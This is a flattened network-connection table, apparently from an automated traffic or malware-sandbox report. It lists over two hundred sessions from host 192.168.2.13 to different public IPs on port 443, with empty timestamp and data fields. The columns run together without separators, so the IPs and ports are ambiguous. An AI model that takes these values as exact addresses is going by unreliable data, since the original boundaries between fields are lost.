                                        24364192.168.2.1335296121.64.133.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24365192.168.2.1353622134.49.124.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24366192.168.2.1345732206.118.45.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24367192.168.2.1333316152.250.255.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24368192.168.2.133511458.240.181.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24369192.168.2.133309051.195.233.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24370192.168.2.134924676.41.162.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24371192.168.2.1353394216.20.251.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24372192.168.2.133456250.9.165.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24373192.168.2.134247891.49.236.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24374192.168.2.1345678131.48.36.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24375192.168.2.1342598124.179.47.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24376192.168.2.134032414.112.176.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24377192.168.2.1336492112.233.235.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24378192.168.2.1360220202.22.111.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24379192.168.2.1344402140.210.24.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24380192.168.2.1334364165.41.98.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24381192.168.2.1341936128.198.120.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24382192.168.2.1346470139.119.198.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24383192.168.2.1355248101.218.247.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24384192.168.2.133329268.51.26.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24385192.168.2.135165823.113.166.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24386192.168.2.135008853.69.38.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24387192.168.2.135323881.64.145.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24388192.168.2.133606049.226.69.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24389192.168.2.133985223.187.214.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24390192.168.2.135041653.42.12.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24391192.168.2.135757671.40.167.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24392192.168.2.13525764.165.225.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24393192.168.2.135637658.26.255.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24394192.168.2.1338964116.232.187.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24395192.168.2.133708883.227.228.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24396192.168.2.1350764132.84.206.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24397192.168.2.1360308136.17.247.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24398192.168.2.1342502204.138.10.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24399192.168.2.1339418159.158.115.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24400192.168.2.1332922163.213.200.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24401192.168.2.1345226221.209.237.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24402192.168.2.1358338162.242.140.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24403192.168.2.135792091.11.125.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24404192.168.2.134933619.206.89.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24405192.168.2.134210224.35.11.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24406192.168.2.133595651.51.137.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24407192.168.2.1342442154.188.82.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24408192.168.2.1360020114.101.50.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24409192.168.2.1334310191.10.164.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24410192.168.2.1334730212.98.69.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24411192.168.2.1337330220.160.235.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24412192.168.2.134568072.142.223.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24413192.168.2.1340058203.195.175.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24414192.168.2.135104068.49.64.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24415192.168.2.1360942187.130.37.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24416192.168.2.1355830111.33.89.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24417192.168.2.1360810106.98.247.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24418192.168.2.1333764123.72.246.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24419192.168.2.1358758193.40.70.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24420192.168.2.135622239.36.235.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24421192.168.2.1355284202.189.139.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24422192.168.2.133885645.225.7.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24423192.168.2.134679899.248.176.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24424192.168.2.1351802131.74.79.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24425192.168.2.135349454.153.68.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24426192.168.2.1343332185.135.213.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24427192.168.2.1333772169.84.91.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24428192.168.2.1338686110.166.126.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24429192.168.2.133289658.161.197.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24430192.168.2.1342700137.112.139.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24431192.168.2.1354932201.201.99.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24432192.168.2.1350616174.152.14.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24433192.168.2.1348260161.131.152.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24434192.168.2.135006048.195.190.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24435192.168.2.133743068.195.166.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24436192.168.2.134664893.11.74.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24437192.168.2.1356878110.127.147.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24438192.168.2.133324841.103.190.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24439192.168.2.135219619.223.97.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24440192.168.2.1346104209.50.127.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24441192.168.2.1340792153.176.25.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24442192.168.2.1332868211.240.95.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24443192.168.2.135138871.97.37.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24444192.168.2.1350474205.49.88.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24445192.168.2.134518275.183.136.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24446192.168.2.134698854.159.64.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24447192.168.2.134311424.176.180.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24448192.168.2.133995490.50.56.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24449192.168.2.1352062121.254.30.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24450192.168.2.1342574130.228.70.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24451192.168.2.1342214132.142.160.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24452192.168.2.1357280141.26.211.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24453192.168.2.133912470.94.209.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24454192.168.2.1347098186.188.58.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24455192.168.2.133317261.9.54.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24456192.168.2.1340906118.20.244.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24457192.168.2.1350680102.222.143.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24458192.168.2.135498080.209.213.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24459192.168.2.1354486176.72.14.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24460192.168.2.1350860216.3.228.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24461192.168.2.1356408191.229.230.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24462192.168.2.1335578107.133.111.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24463192.168.2.1352904188.1.169.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24464192.168.2.1358424114.228.79.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24465192.168.2.1348178206.131.32.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24466192.168.2.135224618.30.121.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24467192.168.2.1336742166.180.117.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24468192.168.2.1335280150.76.119.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24469192.168.2.1360440213.47.104.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24470192.168.2.1334416126.92.53.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24471192.168.2.1358736125.77.47.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24472192.168.2.134469824.71.250.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24473192.168.2.1352328157.242.85.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24474192.168.2.1336854213.102.236.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24475192.168.2.1336378159.213.35.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24476192.168.2.133454443.37.154.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24477192.168.2.1355428187.134.138.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24478192.168.2.1338462179.226.143.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24479192.168.2.1359734162.205.42.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24480192.168.2.1335392129.138.86.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24481192.168.2.1341640192.173.146.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24482192.168.2.134434418.129.75.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24483192.168.2.1344374153.155.96.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24484192.168.2.1352922136.34.140.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24485192.168.2.1337840216.38.118.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24486192.168.2.135570859.55.89.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24487192.168.2.134415865.48.32.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24488192.168.2.134725074.59.24.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24489192.168.2.1360110140.235.216.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24490192.168.2.1359486189.253.152.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24491192.168.2.1358668150.177.125.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24492192.168.2.1341712112.93.225.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24493192.168.2.135094489.136.159.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24494192.168.2.134487864.168.102.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24495192.168.2.1334780159.115.60.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24496192.168.2.1335170190.141.212.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24497192.168.2.1348476203.96.40.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24498192.168.2.1351702202.159.102.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24499192.168.2.134915425.87.0.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24500192.168.2.135200470.227.62.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24501192.168.2.133563892.120.135.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24502192.168.2.1342388134.30.178.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24503192.168.2.1344778156.118.61.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24504192.168.2.1347008207.161.78.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24505192.168.2.134580652.236.250.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24506192.168.2.1348436173.35.188.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24507192.168.2.1347664207.225.108.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24508192.168.2.1333732162.175.195.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24509192.168.2.1333442143.78.161.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24510192.168.2.1355132200.179.16.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24511192.168.2.135084012.211.91.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24512192.168.2.1340494128.56.219.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24513192.168.2.133428270.153.252.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24514192.168.2.1345216148.20.21.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24515192.168.2.1356922138.46.110.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24516192.168.2.133944032.40.28.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24517192.168.2.13609784.137.226.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24518192.168.2.1359836188.236.16.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24519192.168.2.1335896170.44.27.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24520192.168.2.1353406181.238.144.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24521192.168.2.135725887.210.174.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24522192.168.2.134958897.253.161.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24523192.168.2.135896449.253.120.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24524192.168.2.1342512169.254.250.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24525192.168.2.1346504122.51.171.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24526192.168.2.1355746141.203.97.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24527192.168.2.1335538213.201.114.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24528192.168.2.133942634.243.34.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24529192.168.2.1342718200.139.205.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24530192.168.2.135099438.152.102.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24531192.168.2.1339132200.78.26.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24532192.168.2.1343898164.255.25.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24533192.168.2.1334600128.79.147.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24534192.168.2.1353992116.249.108.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24535192.168.2.1360856181.244.79.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24536192.168.2.134077094.29.28.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24537192.168.2.1338384115.198.58.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24538192.168.2.1360480126.48.102.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24539192.168.2.135726032.128.37.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24540192.168.2.135196435.96.254.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24541192.168.2.1354190109.232.48.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24542192.168.2.134101454.72.167.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24543192.168.2.135740270.223.85.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24544192.168.2.1343186210.116.234.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24545192.168.2.134127297.46.5.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24546192.168.2.133317484.210.220.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24547192.168.2.1345872123.199.89.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24548192.168.2.1354452174.120.251.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24549192.168.2.135477081.240.126.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24550192.168.2.133488290.225.231.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24551192.168.2.1338914103.66.214.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24552192.168.2.1334602213.24.202.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24553192.168.2.1339626219.117.141.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24554192.168.2.1339386116.97.159.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24555192.168.2.135965677.104.172.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24556192.168.2.1348222219.244.83.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24557192.168.2.135405086.180.192.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24558192.168.2.133365058.232.104.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24559192.168.2.135377067.188.235.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24560192.168.2.1337552129.43.77.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24561192.168.2.1333442115.247.230.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24562192.168.2.13589309.49.91.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24563192.168.2.1356752184.196.43.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24564192.168.2.133770680.161.84.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24565192.168.2.134302872.33.153.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24566192.168.2.1333122166.209.1.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24567192.168.2.134147862.193.252.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24568192.168.2.135685812.50.132.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24569192.168.2.134641680.46.130.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24570192.168.2.1333098173.7.197.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24571192.168.2.133761647.211.92.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24572192.168.2.135543683.219.177.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24573192.168.2.135991089.103.237.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24574192.168.2.135379042.125.57.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24575192.168.2.135926417.237.32.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24576192.168.2.134249024.86.110.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24577192.168.2.1341672140.240.74.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24578192.168.2.1353454202.246.248.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24579192.168.2.135440649.140.116.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24580192.168.2.1353340166.233.149.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24581192.168.2.1352498137.119.121.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24582192.168.2.135809637.118.84.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24583192.168.2.133285077.88.38.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24584192.168.2.1359166119.149.43.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24585192.168.2.133977684.203.18.213443
                                        TimestampBytes transferredDirectionData


